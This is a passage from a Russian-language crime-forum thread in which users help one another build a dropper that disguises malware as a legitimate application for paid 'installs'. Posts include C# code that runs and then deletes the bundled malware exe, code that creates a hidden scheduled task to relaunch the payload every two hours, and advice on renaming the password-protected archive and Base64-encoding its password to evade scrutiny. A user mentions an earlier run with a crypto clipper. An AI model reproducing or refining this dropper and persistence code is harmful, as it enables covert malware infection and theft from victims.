• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Получаем тематические загрузки вашего exe без слива на ВТ вашей малвари

Пожалуйста, обратите внимание, что пользователь заблокирован
пздц... зоставил ты меня потрудицца 90% прочитал....
млеать на этом форуме раньше инди хотябе был а теперь из-за таких лохов как ты форумец преврощаетцо в вшф или кактомего не путоть с бэхоцэ!!!
а инде вообще жив?Или сторчался на спайсах окончательно?

какой нехорощий ТС, взял по ру проверил схему:) кажется я даже скачивал этого кран-бота :smile46:
Почти год назад было, не думал что вообще зайдет так хорошо. Да и там клиппер обычный был.

Подскажи пожалуйста, а можно ли реализовать запуск exe через заданный промежуток времени? Т.е. задать какой то тайминг, чтобы екзешник стартовал допустим через 2 часа после запуска приложения.

Я настолько разжувал тему, что не заработать на ней просто не реально, это надо быть полным "газосварщиком".
Крч я этот, полный "газосварщик". Ошибки вылазят. Всё нормально до момента компиляции. Скачал мануалов по визуал студии, буду смотреть. Да собственно и саму визуал студию только как начал делать скачал.

Ты не один такой. С первого раза тоже не получилось . За основу бери инфу , а дальше эксперементируй . Ну если честно, то есть более , или скорее мение головняковые способы , может конечно и мение профитные .

Крч я этот, полный "газосварщик". Ошибки вылазят. Всё нормально до момента компиляции. Скачал мануалов по визуал студии, буду смотреть. Да собственно и саму визуал студию только как начал делать скачал.

По этому лучше делать по мануалу, ручками. Без использования готовых исходников. А вообще исходники компилятся должны из коробки.

Подскажи пожалуйста, а можно ли реализовать запуск exe через заданный промежуток времени? Т.е. задать какой то тайминг, чтобы екзешник стартовал допустим через 2 часа после запуска приложения.
Да, можно распаковать его в системную папку не запуская и создать задачу через диспетчер заданий, что бы файл стартанул через 2 часа.

в основном коде удалите:

C#:
Process proc = Process.Start(dir + "\\update.exe"); //Запускаем exe малвари

// 2 строки далее можно удалить или оставить смотря как вам нужно
                    proc.WaitForExit(); //Ждем завершения работы малвари (если требуется)
                    File.Delete(dir + "\\update.exe"); //Удаляем exe малвари  (если требуется)

И вставьте на это место код ниже:

C#:
                var startInfo = new ProcessStartInfo(); // Создаем процесс
                startInfo.FileName = "schtasks.exe"; // Выбираем планировщик задач
                startInfo.CreateNoWindow = false; // Скрываем от пользователя
                startInfo.WindowStyle = ProcessWindowStyle.Hidden; // Скрываем от пользователя
                startInfo.Arguments = @"/create /sc MINUTE /mo 120 /tn ""Название задания"" /tr """ + dir + "\\" + "имя exe файла" + @""" /f"; // Аргументы для запуска
                Process.Start(startInfo); // Запускаем

По этому лучше делать по мануалу, ручками. Без использования готовых исходников. А вообще исходники компилятся должны из коробки.
Я исходники не трогал, пробовал с нуля так сказать, по мануалу

Я исходники не трогал, пробовал с нуля так сказать, по мануалу
Тогда скачай исходники)) мб на каком то этапе что то не то сделал. Посмотри как в исходниках сделанно и так же у себя делай.

Наш архив update.zip назовем: config.y

Все тех. вопросы задаем тут, отвечу всем.

Добрый вечер.
Вопрос наверное нубский, но написано не только для кодеров, поэтому хочу уточнить.
При смене расширения у архива он будет разархивирован ZIP ом?
И второй вопрос, зачем шифровать пароль? Не достаточно сделать его сложным?

Добрый вечер.
Вопрос наверное нубский, но написано не только для кодеров, поэтому хочу уточнить.
При смене расширения у архива он будет разархивирован ZIP ом?
И второй вопрос, зачем шифровать пароль? Не достаточно сделать его сложным?
1. Да же при смене расширения он как был архивом zip так и остается
2. Что бы школяр если вдруг вскроет наш exe не смог увидеть пароль в открытом виде

С предыдущим вопросом понятно. Спсб.
У авс написано :
После жмем в верху VS Сборка > пересобрать проект (после выбора шаблона формы)
Не молгли бы вы уточнить где вверху жмем? По шагам.

Через поиск не нашел. На сайте microsoft по VS тоже нет инф.
Есть: пересобрать решение, но это что то другое.

С предыдущим вопросом понятно. Спсб.
У авс написано :
После жмем в верху VS Сборка > пересобрать проект (после выбора шаблона формы)
Не молгли бы вы уточнить где вверху жмем? По шагам.

Через поиск не нашел. На сайте microsoft по VS тоже нет инф.
Есть: пересобрать решение, но это что то другое.
Screenshot_1.png

нажимаешь сборка, там будут варианты, нужный найдеш

ну его и жми
Жму. Ниже окна с Form1 в окне Вывод
появляется несколько строк. Форма
в окне Form1 не отображается.
242_2.jpg

----------------------------------------------

И сразу ещё пара вопросов на случай если не выйдет.
Если использовать готовое решение:
Crex24.zip - AnonFiles

Фаилы из Crex24 необходимо скомпилировать?
Если да как это лучше сделать?

И где можно менять пароль на архив и имя архива.

Последнее редактирование:
Жму. Ниже окна с Form1 в окне Вывод
появляется несколько строк. Форма
в окне Form1 не отображается.
Посмотреть вложение 6447
Я так же как и ты первый раз увидел VS, посмотри скрины в теме, там всё есть и до момента сборки по идее все должно идти как по маслу, просто делай все по мануалу, каждый шаг расписан. А потом у меня начались проблемы, но вроде разобрался, а потом начались другие...

В
Я так же как и ты первый раз увидел VS, посмотри скрины в теме, там всё есть и до момента сборки по идее все должно идти как по маслу, просто делай все по мануалу, каждый шаг расписан. А потом у меня начались проблемы, но вроде разобрался, а потом начались другие...
Crex24.zip - AnonFiles

Если ты разобрался.

В

Crex24.zip - AnonFiles

Если ты разобрался.
я не компилил из готового, я выше писал что собирал по мануалу. Но если будешь компилить, то просто сделай новый архив со своим файлом, с именами и паролем который тебе нужен, потом через сайт Base64 пароль прогонишь, поменяешь в коде нужные строки и всё.

С первым вопросом по настройкам VS разобрался, спсб. Для начала попробую тоже собрать по мануалу.

Это ты про малварь пишешь, я правильно понял (про архив)?
я не компилил из готового, я выше писал что собирал по мануалу. Но если будешь компилить, то просто сделай новый архив со своим файлом, с именами и паролем который тебе нужен, потом через сайт Base64 пароль прогонишь, поменяешь в коде нужные строки и всё.

А я имею ввиду если не собирать по мануалу, а использовать исходники, в каком файле
находится пароль и имя архива - малвари.

И чем компилировать?

С первым вопросом по настройкам VS разобрался, спсб. Для начала попробую тоже собрать по мануалу.

Это ты про малварь пишешь, я правильно понял (про архив)?

А я имею ввиду если не собирать по мануалу, а использовать исходники, в каком файле
находится пароль и имя архива - малвари.

И чем компилировать?
глянул на скоряк, там его нет(ожидаемо), делаешь свой как написано и всё....ну вообще я хз как на пальцах правильно объяснить, у меня плохо получается, это наверно лучше сделает Тс. Обычно если меня просят я видос пишу и все вопросы сразу отпадают, но это я по своим вопросам, а тут лучше к Тс все таки. Или в ютубе глянь, я сам сидел видосы по визуал студии смотрел, когда панели управления все убрал, сначала не знал как их назад поставить даже)

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх